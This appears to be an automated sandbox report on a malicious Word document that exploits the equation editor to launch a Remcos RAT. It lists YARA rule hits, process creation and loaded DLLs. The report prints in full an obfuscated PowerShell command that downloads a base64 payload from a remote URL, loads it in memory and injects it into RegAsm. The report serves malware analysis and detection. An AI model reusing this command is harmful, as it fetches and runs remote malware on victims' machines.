                Source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 0000000C.00000002.407906179.0000000003429000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0000000C.00000002.407906179.0000000003649000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 3916, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 4004, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 4004, type: MEMORYSTR | Matched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: Process Memory Space: powershell.exe PID: 4004, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: RegAsm.exe PID: 2136, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F971B2FE.doc, type: DROPPED | Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\creambananacakegoodforladieswholovethebananasametimesheknowtheveryniceideadslawyasgetbackgreatthingswithme____securethingsareinthr[1].doc, type: DROPPED | Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | Binary or memory string: org.slneighbors
                Source: classification engine | Classification label: mal100.rans.phis.troj.spyw.expl.evad.winDOCX@24/33@9/5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_00410DE1 GetCurrentProcess,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$an Order and Specification 01-10- 2024.docx
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-IAW1Y3
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR7A9B.tmp
                Source: Scan Order and Specification 01-10- 2024.docx | OLE indicator, Word Document stream: true
                Source: Scan Order and Specification 01-10- 2024.docx | OLE indicator, Word Document stream: true
                Source: Scan Order and Specification 01-10- 2024.docx | OLE document summary: title field not present or empty
                Source: Scan Order and Specification 01-10- 2024.docx | OLE document summary: title field not present or empty
                Source: ~WRF{E867F054-9E2E-42CB-9DBD-A2E82224CF64}.tmp.0.dr | OLE document summary: title field not present or empty
                Source: ~WRF{E867F054-9E2E-42CB-9DBD-A2E82224CF64}.tmp.0.dr | OLE document summary: edited time not present or 0
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\niceworkwithpcitureupdateson.vBS"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | System information queried: HandleInformation
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File read: C:\Windows\System32\drivers\etc\hosts
                Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                Source: RegAsm.exe, RegAsm.exe, 00000010.00000002.431561710.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                Source: RegAsm.exe, 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                Source: Scan Order and Specification 01-10- 2024.docx | Virustotal: Detection: 7%
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Evasive API call chain: __getmainargs,DecisionNodes,exit
                Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\niceworkwithpcitureupdateson.vBS"
                Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GV '*mDr*').naMe[3,11,2]-JoiN'')( (('{1}url = {0}htt'+'ps'+':/'+'/raw.g'+'it'+'hubusercont'+'ent'+'.co'+'m/NoDe'+'tec'+'tOn'+'/N'+'oD'+'e'+'tect'+'On/refs'+'/heads/'+'main'+'/Deta'+'hNo'+'th-V.txt{0}; {1'+'}'+'b'+'ase64Content = (New'+'-Ob'+'jec'+'t S'+'y'+'s'+'tem.Net'+'.Web'+'Clie'+'nt).'+'Downlo'+'adStr'+'ing({'+'1}u'+'rl); {1}b'+'in'+'aryContent = ['+'Syst'+'e'+'m.'+'Co'+'nver'+'t'+']'+'::'+'FromBa'+'se6'+'4S'+'t'+'ri'+'ng({'+'1'+'}ba'+'se'+'64Cont'+'e'+'n'+'t); {1}a'+'ssembly = ['+'Re'+'flect'+'i'+'on'+'.'+'Assem'+'b'+'ly]'+'::'+'Lo'+'ad('+'{1}b'+'inar'+'yConte'+'nt); [dnl'+'ib.IO.'+'Home]'+'::'+'VA'+'I({2}tx'+'t.BGF'+'R/'+'0'+'1'+'5/8.7.8'+'61.401//'+':ptth{2}, {'+'2'+'}'+'d'+'esa'+'tivado{2}'+', {2}de'+'s'+'ativad'+'o'+'{2'+'}, {2'+'}des'+'at'+'iva'+'do{'+'2}'+', {2}R'+'e'+'gAsm{'+'2}, {2'+'}{2},'+'{'+'2'+'}'+'{2})')-f [cHAR]39,[cHAR]36,[cHAR]34))"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ichnvnuxjbsorvkwq"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ichnvnuxjbsorvkwq"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\twmgvffrxjktbjyahjdg"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\vyrywypslrcydpuequqaufz"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\irflzfvzpruafqgyqnkxgb"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\algvnlhhqgudzwxguvhnulfpxhl"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\srzilnhhbbbtiyigffpvarsgam"
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: wow64win.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: wow64cpu.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: msi.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: cryptsp.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: rpcrtremote.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dwmapi.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: version.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: secur32.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: winhttp.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: webio.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: iphlpapi.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: winnsi.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dnsapi.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: nlaapi.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dhcpcsvc6.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dhcpcsvc.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: rasadhlp.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: propsys.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: ntmarta.dll
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wow64win.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wow64cpu.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: dwmapi.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mpr.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrrun.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64win.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64cpu.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rpcrtremote.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64win.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64cpu.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: shcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
